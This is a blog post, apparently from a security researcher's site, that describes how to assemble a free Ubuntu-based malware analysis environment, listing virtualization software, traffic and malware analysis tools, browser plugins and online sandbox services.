Attributes of a Zero Dollar Malware Analysis System

Please note this environment is not meant to be a sandbox but rather an environment where one can conduct research on malware while most likely not executing the malware (unless you consider malicious code on a website malware then it will execute). ?However, most downloaded critters won’t execute in this environment. ?Please visit the upcoming desktop support article for detailed instructions on how to set up and leverage this environment without spreading infections.

Virtual Environment

Selecting a virtual environment is fairly easy, however, it does bring about a lot of debate. Personally I don’t understand the argument. If you are looking for a desktop virtual environment but not willing to pay for it, go with Sun XvM. Sometimes the networking can cause some issues but on the whole it seems to work a lot better than Virtual Player. I have a copy of VMware Workstation and I prefer that, so VMware Server is also a valid choice but requires more set up than I felt like doing. Thus, here are the primary desktop virtualization options for the basic Malware Analysis Environment we’re going to set up today.

Sun XvM (AKA Virtual Box)?http://www.virtualbox.org/wiki/Downloads

VMware Virtual Player?https://www.vmware.com/tryvmware/?p=player&lp=1&sourceid=chrome&ie=UTF-8&q=VMware%20Virtual%20Player

The Operating System: Ubuntu

A generic copy of Ubuntu 9.10 can be very easy to use and extremely powerful. In addition, many of the tools necessary for observing malware are open-source or Linux specific tools. Unfortunately however, a Linux system will most likely not execute the actual malware. This is both a positive and a negative in that it creates a little bit safer environment for dissecting the malware, however it also makes things a touch more difficult. ?It is for the ladder that it is recommended that users utilize resources such as CW Sandbox and Threat Report for analyzing execution of malware.

Traffic Analysis Tools

Wireshark (#apt-get install wireshark)

Wireshark is somewhat of an industry standard in packet sniffing through a graphical user interface. Utilizing Wireshark can be extremely useful in analyzing malware delivered through web applications. Wireshark will record aspects such as unauthorized redirects and attempts at delivering payloads and/or attempts to pull down malware on a machine.

EtherApe (#apt-get install etherape)

Following what is happening during full packet capture can often be difficult however. That’s where EtherApe comes in. EtherApe monitors network activity through graphical representation. The visual representation of network traffic is essential in detecting unauthorized channels that should be tracked down.

NetWitness Investigator (http://www.n etwitness.com)

Although NetWitness Investigator is not necessarily a Linux utility it is extremely useful in analyzing malware. Packet captures can be loaded into NetWitness Investigator in order to forensically investigate network traffic as well as run the entire packet capture against multiple threat feeds. This helps in determining IP reputation for systems involved in a malware attack.

Snort (http://www.snort.org)

The inclusion of the worlds most recognizable open-source Intrusion Detection System is obvious. Snort can help detect the type of attack that is being run as well as serve as an excellent resource for determining what aspects of captured traffic to analyze. Snort can either be run actively while attempting to observe how malware is delivered or it can be run against packet captures.

Malware Analysis Tools

PDF-Parser (http://blog.didierstevens.com/programs/pdf-tools/)

A lot of exploits currently targ et Adobe Reader exploits. As a result a large amount of malware infects machines through the delivery of malciously crafted .pdf documents. Thus, tools like pdf-parser which allow investigators to better analyze what is housed within pdf documents are essential.

jsunpack-n (http://jsunpack.jeek.org/jsunpack-n.tgz)

Jsunpack is a tool specifically designed for assisting security researchers in the analysis of malware infected websites. Specifically jsunpack cited as being a “generic javascript unpacker.” However, jsunpack has several features that go well-beyond unpacking.

Paros Proxy (http://www.parosproxy.org/download.shtml)

Paros Proxy is a web proxy that can be locally stored. Paros allows investigators to trap specific server requests and responses in order to more easily traffic what is being delivered to a system. Paros Proxy can also be leveraged to spider web applications should a detected piece of malware be called as function of a full attack. For example, many malware infected sites utilize separate scripts to call things such as heap sprays or shellcode. In these situations alerts that detect the heap spray attempt or the shellcode may sound, however, the controlling page may be difficult to find. In such a scenario spidering a site may be able to detect the controlling malware infection.

Burp Suite (http://www.portswigger.net/suite/)

Burp Suite is similar to Paros Proxy in it’s usage for malware analysis as it too is a web proxy that can be stored locally. However, Burp Suite is much more powerful than Paros. In the opinion of SecAnalysis however, the user interface is not nearly as pretty or user friendly however.

Assembly Language Debugger (http://ald.sourceforge.net/)

SecAnalysis preferences for graphical debuggers include ImmunitySec debugger, Ollydbg, and IDA Pro. However, getting any of these to run in an Ubuntu environment can be somewhat challenging and often times requires Windows emulation. Thus, Assembly Language Debugger is preferred for this type of malware analysis environment.

String (Pre-installed on Ubuntu)

String can help pull code from files such as .jpg’s in an easy to read fashion. This can be essential in manual source code analysis.

Firefox & Plugins

User Agent Switcher (https://addons.mozilla.org/en-US/firefox/addon/59)

Sometimes malware infected websites will first detect the browser version that is attempting to access the site. Once the site detects the browser version, it determines what malware to deliver or whether to deliver malware at all. Thus, utilizing user agent switcher to spoof IE 6, IE 7, IE 8, searchbots and even iPhones can help circumvent these detection mechanisms.

Web Developer (https://addons.mozilla.org/en-US/firefox/addon/60)

Web developer has a ton of uses in observing malware. It can be especially helpful in tracking down pesky iFrames and hidden form fields. Essentially web developer allows users to control the representation of client side code as well as assist in reviewing malware infected web sites.

Websites

Wepawet can be highly useful for analyzing malicious javascript, infected flash websites, as well as infected pdf documents. Wepawet often misses new infections, however, so caution should be used when leveraging wepawet.
Virus total can run malicious files ?against multiple antivirus scanners, therefore giving users some clue of detection. It should be noted however, that simply saving a malicious website to a file is more likely to trigger generic signatures whereas pulling the shellcode and creating an exe out of the shellcode (http://sandsprite.com/shellcode_2_exe.php can produce more descriptive results. However, use caution as creating an executable with sandsprite has in the past produced generic results on virus total such as “Downloader or Troj_Downloader” with non-malicious code. This possibly means that some sandsprite additions may cause certain AV vendors to trigger alerts regardless of the shellcode that is meant to be analyzed.
CW Sandbox will actively execute malicious code and observe the affects that the code has on an environment. This can be especially useful while working within a Linux environment.

Threat Expert has conducts similar activities as CW Sandbox, however, the reports can often times be more useful.





*Whoa whoa did I mess something up or forget something? Don’t get mad…just let me know shoot me an E-mail at mmontecillo “a”-with-a-circle-around-it secanalysis.com or hit me up on twitter @Montejam.

Comments are closed.